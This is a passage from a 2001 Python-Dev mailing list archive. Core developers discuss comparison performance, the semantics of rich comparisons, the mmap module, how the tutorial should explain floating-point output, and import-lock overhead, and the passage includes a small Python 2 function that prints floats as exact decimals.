At least to some of us, performance is an > > issue and I think that there's a lot we can do to improve it. > > "Performance" is meaningless unless quantified and made concrete: what is it > that runs too slowly? "Everything" is not a useful answer. Speeding up > line-at-a-time input was an example of something that worked, via focus and > measurement and pushing ahead despite opposition. I doubt any other approach > will bear fruit over such a short timeframe, and especially not without > resources to throw at it. Let's put it this way: if pystone gets a 50% boost, then all applications should benefit from it regardeless whether they are function call intense or fiddle with a lot of attributes. Achieving those 50% will be a lot harder than for the 1.5 series, though ;-) > > One way to open up the field for better performance will be > > to modularize the interpreter, so that new ways of optimization > > can be explored, e.g. truning the VM a register machine > > (Skip once started looking into this with his Rattlesnake > > patches) or creating specialized VMs which can then be used > > by optimizing compilers as targets. > > Restructure the core for the benefit of optimizing compilers that don't > exist? That sounds like an interesting research project, but not much to do > with making 2.3 faster. In the meantime, modularization is more likely to > make the VM that does exist slower. Depends on how you look at it: extension writers will then have the possibility of plugging in new compilers and VMs into Python to experiment with new optimization strategies. The Rattlesnake project is one such project which would do great with this plugin logic since it uses special opcodes which an optimizer generates and then needs a modified VM to execute these new byte code streams... from Rattlesnake import compiler, vm sys.use_compiler(compiler) sys.use_vm(vm) This won't make stock Python 2.3 faster, but at least provide better means for experiments in that direction. 
Alternative VM implementations like Stackless Python would also benefit from it. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sun May 20 23:13:04 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:13:04 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, on pointer-equality tests in string_compare()] > I've done some measurements here, too, again taking your example > ... > for i in indices: > "ab" < "ab" > ... > This is the case where testing for identity helps. Running it without > identity test takes 0.74s, running it with identity test takes 0.68s. This stuff all ties together. A pointer-equality test in string_compare() is guaranteed to lose every time string_compare() gets called from lookdict_string(). Let's lose string_compare() entirely (in favor of a self-contained-- apart from memcmp() --string_richcompare). From tim.one at home.com Sun May 20 23:37:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:37:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> Message-ID: [Tim, muses about a Py_CMP value for rich comparisons, and talks mostly about dict comps] > ... > I'm not sure I see the saving. There's no real saving in time, > because you still have to make separate calls for EQ and CMP, right? Right so far as it goes. A "fast path" (which currently doesn't exist but is clearly worth adding, based on both my and Martin's timings) for doing *all* kinds of same-type comparisons would only have to look for a richcompare slot, though, not one kind of slot in some cases and another in others. Uniformity is contagious . 
> There might be a saving in code, but you could solve that internally > in dictobject.c by restructuring the code somewhat so that > dict_compare shared more with dict_richcompare, right? Right, there would be no reduction in total code, and the dict routines already share as much as possible. In effect, the body of dict_compare would replace the last res = Py_NotImplemented; line in the (currently tiny) dict_richcompare guarded by the appropriate tests. > It's mostly an API streamlining. Bingo, and the possibility of retiring the tp_compare slot in P3K. > The other difference between tp_compare and tp_richcompare is that > the latter returns an object which makes testing for errors unambiguous. Also cool. > But (for several releases) we would still have to support tp_compare > for b/w compatibility with old 3r party extensions. Sure, although the way the CVS branch code is going it could be that 2.2 is the long-awaited utterly incompatible P3K anyway . >> The list and tuple richcmps are also doing almost all the work needed >> to compute a 3-way cmp outcome. > Ditto. Oh no! Those aren't like dict compares. A rich compare for sequence types (whether strings or lists) *has* to contain almost all the code necessary to implement cmp(), because just resolving Py_EQ in all cases has to find "the first" element (if any) that differs. Once that's known, you're at most one measly element compare away from producing the right cmp() outcome. This isn't true of dict compares: the algorithm for resolving dict Py_EQ/Py_NE when the dict sizes are the same doesn't do anything to help resolve general cmp(). Yes, a tp_compare slot could be re-added to lists and tuples, and implemented via refactoring their current tp_richcompare code into a common internal routine, but then we've just added another layer of function calls for all cases. I've timed C function calls, and it turns out they aren't actually free . 
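Tim's point about list and tuple rich comparisons can be made concrete with a small Python model. It is a sketch under assumptions, not CPython's list_richcompare/tuple_richcompare: the function names are hypothetical, op strings stand in for Py_LT ... Py_GE, and `seq_cmp` assumes the items are totally ordered. The point is that once the first index whose items differ under == is known, Py_EQ/Py_NE are already settled, and any ordering (including a three-way cmp() result) costs at most one more element comparison.

```python
import operator

OPS = {"lt": operator.lt, "le": operator.le, "eq": operator.eq,
       "ne": operator.ne, "gt": operator.gt, "ge": operator.ge}

def first_mismatch(v, w):
    """Index of the first position where the items differ under ==."""
    n = min(len(v), len(w))
    i = 0
    while i < n and v[i] == w[i]:
        i += 1
    return i

def seq_richcompare(v, w, op):
    """Rich comparison of two sequences, decided by the first mismatch."""
    # List-style shortcut: different lengths settle == and != immediately.
    if op in ("eq", "ne") and len(v) != len(w):
        return op == "ne"
    i = first_mismatch(v, w)
    if i >= min(len(v), len(w)):
        # No differing item: compare the lengths instead.
        return OPS[op](len(v), len(w))
    if op == "eq":
        return False
    if op == "ne":
        return True
    # One more element comparison resolves any ordering.
    return OPS[op](v[i], w[i])

def seq_cmp(v, w):
    """Three-way result from the same scan (assumes totally ordered items)."""
    i = first_mismatch(v, w)
    if i >= min(len(v), len(w)):
        return (len(v) > len(w)) - (len(v) < len(w))
    return -1 if v[i] < w[i] else 1
```

Both functions share `first_mismatch`, which is where almost all of the work happens; that is why a separate tp_compare for lists and tuples would mostly add another layer of calls rather than save any.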
From tim.one at home.com Mon May 21 09:53:24 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 03:53:24 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I would like to break this down by defining the mapping between cmp() > and rich comparisons. Good idea! > I propose: > > - If cmp() is requested but not defined, and rich comparisons are > defined, try ==, <, > in order; if all three yield false, act as if > rich comparisons were not defined, and use the fallback comparison > (i.e. by address). Here and below didn't cover the case where cmp() is requested and is defined. I believe it's agreed now (but wasn't yet at the time you wrote this) that cmp() will be called in that case (and which requires changes to the current implementation). > - If a rich comparison is requested but not defined, use cmp() and use > the obvious mapping. Cool, except this is missing what I believe was intended detail, like that when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be tried before falling back to cmp(). Also note this today: class C: def __lt__(x, y): print "in __lt__" return NotImplemented def __gt__(x, y): print "in __gt__" return NotImplemented C() < C() That prints in __lt__ in __gt__ in __gt__ in __lt__ I don't know to explain why each method gets called twice (well, I do, but it's hard to swallow ). Again this can have semantic consequences, e.g. if the methods have side-effects; and unclear whether this is intended, a bug, or implementation-defined. > - Continue to define the comparison of unequal sequences in terms of > cmp(). "the comparison" is ambiguous there: you mean all comparisons? just cmp() comparisons? just rich comparisons? In any case, also unclear what "in terms of cmp()" means: that every pair of corresponding elements must be compared via cmp()? Or that only the first non-Py_EQ pair must be compared via cmp()? 
Pseudo-code would be much clearer than English here. > - Testing == or != for sequences takes these shortcuts: Must take these shortcuts, or may take these shortcuts? > 1. if the lengths differ, the sequences differ Note that I removed the tuple_richcompare code for doing this, because I never found a case where tuples were compared via Py_EQ/Py_NE and the lengths differed. So the length-check in this case was a waste of time. It isn't true of lists or strings that it's a waste of time, but I believe there are strong reasons for why programs simply will not compare different-sized tuples for equality. I would not like to pay for tuple length checks if only one case in 500 billion would benefit, but if #1 is a mandatory shortcut there's no choice. > 2. compare the elements using == until a false return is found Currently the sequence rich-compare code does #2 for all 6 comparison operators. Is that wrong? Looked reasonable to me! > Note that this defines 'x!=y' as 'not x==y' for sequences. We could > easily go the extra mile and define != to use only != on the items; > but is this worth the extra complexity? Not at all: tuples and lists are Python's sequence types, so Python is entitled to define what comparison means for them in any way it likes. We've already got cases where (see the first msg in this thread) [x] cmpop [y] may yield a different result than x cmpop y so we've already punted on doing the best-possible job of mimicking whatever crazy-ass comparisons user-defined objects implement, when those objects are contained in Python sequences. My bias is showing : I want Python's builtin sequence types to be as efficient as possible. Nasty example: two conformable (same rank and dimensions) NumPy matrices A and B return a conformable matrix of 0/1 bits when compared via "<" (well, maybe they actually don't, but that's what drove richcmps to begin with!). 
It may well be *convenient* for them if (A1, A2, A3) < (B1, B2, B3) always returned a list (or tuple) of 3 0/1 matrices too: [A1 < B1, A2 < B2, A3 < B3] So builtin sequence comparisons can't be all things to all people regardless. From Barrett at stsci.edu Mon May 21 14:17:09 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Mon, 21 May 2001 08:17:09 -0400 Subject: [Python-Dev] mmap module References: Message-ID: <3B090745.5D70353E@STScI.Edu> Tim Peters wrote: > > [Paul Barrett] > > In the CVS log of the mmapmodule.c, Tim Peters says: > > > > "The code really needs to be rethought from scratch (not by me, though > > ...)." > > That was in specific reference to the code I changed, in mmap_find_method. > The difficulty is that mmap is great for "large files", but the code before > my change used a C int for the starting offset and also for the return > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 > bytes). The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform > capabilities out of reach for large files (e.g., "even Win95" *allows* > specifying 64-bit offsets when creating a mapped file view). C is a > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() > don't cater to the full range of C integral types anyway. In other words, > if this code is ever to reach its full potential, it "really needs to be > rethought from scratch". OK, thanks for the clarification. > > The ability to have offsets into a file that are not multiples of the > > system pagesize would also be nice. > > It's OS-specific. Python should grow warts to protect against it on the > OSes that care. Well, hopefully the OS-differences wouldn't prevent implementing a more abstract interface. > > I'd be willing to submit a PEP on a new mmapmodule, once I know what > > others would like. 
> > Hard to say. This has the potential to become Python's next thread > subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If > you do write a PEP, I vote to say that we'll cover Windows and Linux (and > maybe Mac OS X?) out of the box, but any other platform is at your own risk > (it doesn't really help if somebody pops up volunteering to support a > minority platform, because they eventually go away, their code stops > working, and it never gets fixed -- so it's use-at-your-own-risk in reality > regardless). Yes, I agree. Windows, Unix/Linux, and Mac OS X should be the supported platforms. My intention is not to make major changes to the Python interface, but to fix bugs and to implement some additional features, such as a non-pagesize file offset. I'll try to get something written up in the near future. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From martin at loewis.home.cs.tu-berlin.de Mon May 21 18:44:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 18:44:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de> > This stuff all ties together. A pointer-equality test in string_compare() is > guaranteed to lose every time string_compare() gets called from > lookdict_string(). Let's lose string_compare() entirely (in favor of a > self-contained-- apart from memcmp() --string_richcompare). Ok. I've now updated my patch on SF to remove string_compare, inline everything into string_richcompare, add _PyString_Eq, and use that in lookdict_string. Who would want to review and approve/reject this patch? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 21 19:03:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. 
Loewis) Date: Mon, 21 May 2001 19:03:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> > Note that the usual way to write this is > > if (c < 0 && PyErr_Occurred()) > > More work for my artificial "ab" < "cd" case but a net win in real life (when > c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, > when c < 0 there's no way in the cmp protocol to use c's value alone to > distinguish between "less than" and "error"). Ok. I've updated my tp_compare patch on SF to do so; it also un-deprecates UserList.__cmp__. > > Here, I get 3 function calls: f is string_compare, then > > PyErr_Occurred, finally convert_3way_to_object, which converts > > {-1,0,1} x Op -> {Py_True, Py_False}. > > Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. Any reason why PyThreadState_GET isn't used there? > There's no danger of over-indexing when ob_size==0, because it doesn't > include the trailing null byte Python always sticks at the end of string > objects; and the first-byte check is much more likely to pay off than the > zero-length check (comparison to a null string? gotta be rare as clear > conclusions ), and better to test for the more common case first. This is now also in the string_richcompare patch on SF. Regards, Martin From tim.one at home.com Mon May 21 20:29:02 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 14:29:02 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com> Message-ID: [Fred checkin] > > *************** > > *** 2610,2617 **** > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200*200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.4, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... 
p = [x, y] > > --- 2610,2617 ---- > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200 * 200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.400000000000002, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] [Guido] > Hmm... The tutorial now contains at least one example of floating > point imprecision. Does it also contain text to explain this? (I'm > sure Tim would be happy to provide some if there isn't any. :-) [Fred] > It contains others, and I don't think there's an explanation. Some > text from Tim to explain this would be greatly appreciated! Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: so long as we rely on the platform C to format floats, the output isn't well-defined (the last digit or so can and will vary across boxes). I can certainly explain that this is so, and even why, but unsure the tutorial is the right place for it. In any case the tutorial shouldn't be giving examples whose output is platform-dependent. For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour the tutorial for all such cases? Or we could put the attached function at the start of the tutorial and use it to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that.

def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)

From guido at digicool.com Mon May 21 21:02:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 15:02:43 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT." References: Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com> > Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: > so long as we rely on the platform C to format floats, the output isn't > well-defined (the last digit or so can and will vary across boxes). I can't check right now, but I thought that this was pretty consistent across some common platforms? > I can certainly explain that this is so, and even why, but unsure > the tutorial is the right place for it.
In any case the tutorial > shouldn't be giving examples whose output is platform-dependent. > For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour > the tutorial for all such cases? Are you serious? This is something that the newbie who is in the least bit adventurous will run into anyway, so I don't think that not talking about this at all in the tutorial is fair or helpful. That just perpetuates the questions from newbies about "floating point is broken" -- since none of the tutorial examples prepare them for this. Since this is behavior that is ordinarily observed and perpetually perplexing, I think it *must* be treated in the tutorial. The tutorial doesn't have to have the full explanation -- maybe it's enough to say something like ``due to round-off errors you will sometimes see inexact results like 31.400000000000002; don't worry about this, you can use str() or "%g" (but not round()!) to strip redundant precision, and here's a URL for more info.'' Or maybe the full story can be an appendix. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:09:04 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:09:04 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net> Guido van Rossum wrote: > > Or maybe the full story can be an appendix. Or maybe Decimal should go in the standard distribution? What kind of deadline do I have for finishing that to go into 2.2? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine.
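Tim's f2ds() above peels bits off with math.frexp()/math.ldexp() and Python 2 long literals. As a sketch only, assuming Python 3 (where float.as_integer_ratio() returns a reduced fraction whose denominator is a power of two for every finite float), the same exact-decimal idea can be written by multiplying the numerator by 5**k to turn num/2**k into (num * 5**k)/10**k. The name float_to_exact_decimal is hypothetical; decimal.Decimal(x), which also converts a float exactly, is used only as a cross-check.

```python
from decimal import Decimal


def float_to_exact_decimal(x: float) -> str:
    """Return finite float x as an exact "<digits>e<exponent>" string.

    Hypothetical Python 3 port of the f2ds() idea; infinities and NaNs
    are not handled (as_integer_ratio() raises for them).
    """
    if x == 0:
        return "0e0"
    sign = "-" if x < 0 else ""
    # For a finite float the reduced denominator is always a power of two.
    num, den = abs(x).as_integer_ratio()
    k = den.bit_length() - 1          # den == 2**k
    # num / 2**k == (num * 5**k) / 10**k, an exact decimal value.
    top, exp = num * 5**k, -k
    # Strip trailing decimal zeros so the last digit is nonzero.
    while top % 10 == 0:
        top //= 10
        exp += 1
    return f"{sign}{top}e{exp}"


if __name__ == "__main__":
    x = 10 * 3.14
    print(float_to_exact_decimal(x))
    # Decimal(float) is exact too, so the two must agree numerically.
    print(Decimal(float_to_exact_decimal(x)) == Decimal(x))
```

On an IEEE-754 double platform the first line should reproduce the digits in Tim's f2ds(10 * 3.14) session. Using as_integer_ratio() avoids the chunked bit-extraction loop, because Python 3 integers are already unbounded.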
From guido at digicool.com Mon May 21 22:35:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:35:10 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT." <20010521200904.05CAE99C81@waltz.rahul.net> References: <20010521200904.05CAE99C81@waltz.rahul.net> Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com> > > Or maybe the full story can be an appendix. > > Or maybe Decimal should go in the standard distribution? What kind of > deadline do I have for finishing that to go into 2.2? Adding Decimal to the distribution is fine. But using it by default for floating point literals and other floating point results is a different story. The PEP about that hasn't really been discussed enough to make a decision, but a conservative estimate is that this change won't be made in 2.2. So Decimal doesn't solve the problem the tutorial has. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:42:15 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:42:15 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM Message-ID: <20010521204215.F216699C81@waltz.rahul.net> Guido van Rossum wrote: > >>> Or maybe the full story can be an appendix. >> >> Or maybe Decimal should go in the standard distribution? What kind of >> deadline do I have for finishing that to go into 2.2? > > Adding Decimal to the distribution is fine. But using it by default > for floating point literals and other floating point results is a > different story. The PEP about that hasn't really been discussed > enough to make a decision, but a conservative estimate is that this > change won't be made in 2.2. So Decimal doesn't solve the problem the > tutorial has. 
Wasn't thinking of going quite that far, only changing the tutorial to say something like, "If you want speed, use the hardware FP (which is directly supported by Python's floating literals); if you want accuracy, use Decimal." (Or FixedPoint, which is already in the distribution.) The full story needn't go in the Appendix; we can simply refer people to Cowlishaw and Kahan. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido at digicool.com Mon May 21 22:57:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:57:08 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT." <20010521204215.F216699C81@waltz.rahul.net> References: <20010521204215.F216699C81@waltz.rahul.net> Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com> [Aahz] > >>> Or maybe the full story can be an appendix. > >> > >> Or maybe Decimal should go in the standard distribution? What kind of > >> deadline do I have for finishing that to go into 2.2? [Guido] > > Adding Decimal to the distribution is fine. But using it by default > > for floating point literals and other floating point results is a > > different story. The PEP about that hasn't really been discussed > > enough to make a decision, but a conservative estimate is that this > > change won't be made in 2.2. So Decimal doesn't solve the problem the > > tutorial has. [Aahz] > Wasn't thinking of going quite that far, only changing the tutorial to > say something like, "If you want speed, use the hardware FP (which is > directly supported by Python's floating literals); if you want accuracy, > use Decimal." (Or FixedPoint, which is already in the distribution.) 
> The full story needn't go in the Appendix; we can simply refer people to > Cowlishaw and Kahan. I think that most people don't care about either speed or accuracy, but (being Python users) everybody cares about convenience, and convenience is using the built-in floating point literals. (Also, most other modules returning or using floating point numbers use binary floating point, e.g. the time module and of course the math module.) As long as the built-in literals are binary floating point, they are what 99% of the code uses, so we need to explain the pitfalls. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at cj42289-a.reston1.va.home.com Mon May 21 23:47:35 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Mon, 21 May 2001 17:47:35 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental updates to the Python 2.2 documentation. From tim at digicool.com Mon May 21 23:57:22 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 17:57:22 -0400 Subject: [Python-Dev] FP vs. tutorial Message-ID: Let's get some errors cleared up first: + FixedPoint is not in the distribution. + There is no PEP for Decimal. + Decimal f.p. is not more accurate than binary f.p. In fact, it's provably worse (but not by much). For the rest, + Yes, I'm serious about not including tutorial examples with platform-dependent output, unless they're explicitly meant to illustrate non-portable code. + Specific small examples notwithstanding, there is no uniformity across platforms in the last digit or so, because not even the IEEE- 754 standard requires that (while C is much sloppier than 754), and vendors generally don't implement anything better than the minimum necessary when it comes to f.p. (Sun is a notable exception). 
+ Happy to add text explaining the existence of surprises, and providing a URL. Do the floating-point morons on Python-Dev find this one comprehensible?: http://www.lahey.com/float.htm From guido at digicool.com Tue May 22 00:33:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 18:33:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT." References: Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com> > + Yes, I'm serious about not including tutorial examples with > platform-dependent output, unless they're explicitly meant to > illustrate non-portable code. Sure. Most examples can be rewritten to avoid platform-dependent output. But there should be one section on floating-point inaccuracies that shows a few of the kind of things you can expect on a typical platform, and 1.1 -> 1.1000000000000001 is pretty common. > + Specific small examples notwithstanding, there is no uniformity > across platforms in the last digit or so, because not even the IEEE- > 754 standard requires that (while C is much sloppier than 754), and > vendors generally don't implement anything better than the minimum > necessary when it comes to f.p. (Sun is a notable exception). So we'll have to add something like "the actual inexact output you see may differ from the inexact output in this example". > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I was thinking more of immortalizing this one: http://www.python.org/cgi-bin/moinmoin/RepresentationError This can serve as a nice self-contained section on f.p. surprises. --Guido van Rossum (home page: http://www.python.org/~guido/) From MarkH at ActiveState.com Tue May 22 01:06:39 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:06:39 +1000 Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com> Message-ID: > > + Happy to add text explaining the existence of surprises, and > > providing a URL. Do the floating-point morons on Python-Dev > > find this one comprehensible?: Hey - I resemble that remark! > > http://www.lahey.com/float.htm I quite liked the tone of this note. The Python-dev morons probably could make good sense of this, but only due to the relentless persistence of a certain timbot. If not for Tim, I would have forgotten completely about binary floating point versus decimal floating point. IIRC, me and about 40 other guys were desperately trying to get the attention of the single CS female on the day that lecture was given. (Actually, that is a pretty safe bet - _all_ lectures were spent that way :) However, without a little additional background I doubt the masses would be able to get too far into this. As Tim has said a few times, most people won't care - they just want it to work! > I was thinking more of immortalizing this one: > > http://www.python.org/cgi-bin/moinmoin/RepresentationError IMO, this is a little worse. There is less "background". Eg, in almost the first paragraph we see:

"""
Rewriting

     1        J
    ---  ~=  ----
    10       2**N
"""

And I went "huh? Where did j and N spring from?". Reading a bit further made it clear, but this document did seem a little impenetrable to floating point or maths newbies. It seems to me that the RepresentationError document was written for people with a decent background in maths - exactly the sort of people who _don't_ need such a document. Just-my-0.020000002-cents-worth ly, Mark.
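Guido's suggestion of hiding the noise with str() or "%g", and Tim's advice to prefer 10 * 3.25 (3.25 is 13/4, exact in binary) over 10 * 3.14, can be illustrated with a short sketch. It assumes Python 3.1 or later, where repr() of a float already returns the shortest string that round-trips, so the display differs from the 17-significant-digit repr of the 2001-era interpreters discussed here.

```python
x = 10 * 3.14          # 3.14 has no exact binary representation
y = 10 * 3.25          # 3.25 == 13/4, so this product is exact

# repr() shows enough digits to round-trip the stored binary value.
print(repr(x))
# "%g" (6 significant digits by default) hides the representation error.
print("%g" % x)
# A fixed number of significant digits in a format spec does the same.
print(format(x, ".15g"))
# The exact case prints cleanly with no formatting help at all.
print(repr(y))
# Comparing against the "obvious" literal exposes the difference.
print(x == 31.4, y == 32.5)
```

Formatting only changes what is displayed; the stored value of x is still not equal to the float written as 31.4.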
From jeremy at digicool.com Tue May 22 01:13:09 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 21 May 2001 19:13:09 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <15113.41221.839653.822246@slothrop.digicool.com> We looked at the SecondImport test case today. It's a good test case for programs that execute "import os" in a time-critical inner loop :-). The primary reason it is slower is the import lock that was added after 1.5.2. The benchmark, run in isolation, spends about 6 percent of its time in the locking code. Since it only spends about 20 percent of its time actually doing imports, this is a pretty substantial cost. It seems possible to eliminate some of the cost by using a special marker in sys.modules that means: "This is not a module, but it's being loaded by another thread." But Guido doesn't sound interested in optimizing programs with imports in inner loops. Jeremy From tim at digicool.com Tue May 22 01:20:16 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 19:20:16 -0400 Subject: [Python-Dev] test_mailbox now fails on Windows Message-ID: Appears to be because new code uses os.link, which doesn't exist on Windows. BTW, test_urllib2.py is still failing on Windows (and has been for a couple of weeks). From michel at digicool.com Tue May 22 01:42:49 2001 From: michel at digicool.com (Michel Pelletier) Date: Mon, 21 May 2001 16:42:49 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Mark Hammond wrote: > > > + Happy to add text explaining the existence of surprises, and > > > providing a URL. Do the floating-point morons on Python-Dev > > > find this one comprehensible?: > > Hey - I resemble that remark! As they say in the south, "mah-self" > > > http://www.lahey.com/float.htm > > I quite liked the tone of this note. 
The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. I liked the tone too, but it really goes into a lot of detail, there's this problem, and that one, oh and also *this* one and then there's *that* and the other thing, and after a while you get the impression that floating-point is for the insane. > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys were > desperately trying to get the attention of the single CS female on the day > that lecture was given. (Actually, that is a pretty safe bet - _all_ > lectures were spent that way :) The funny thing about that is we were in *Long Beach* (I assume you mean IPC9), if you wanted to see beautiful, scarcely clothed women in an acceptable public venue you wouldn't have had to go far, and they would have probably had more interesting "significant bits" (it's none of anyone's business where *I* was during the lectures ;). Someone on the Zope list proposed P4W (Python for Women). Poor, desperate souls. Obviously, P4E includes them too!! > > I was thinking more of immortalizing this one: > > > > http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. I agree. Equations should not be needed to explain this. -Michel From MarkH at ActiveState.com Tue May 22 01:47:06 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:47:06 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: > > The funny thing about that is we were in *Long Beach* (I > assume you mean 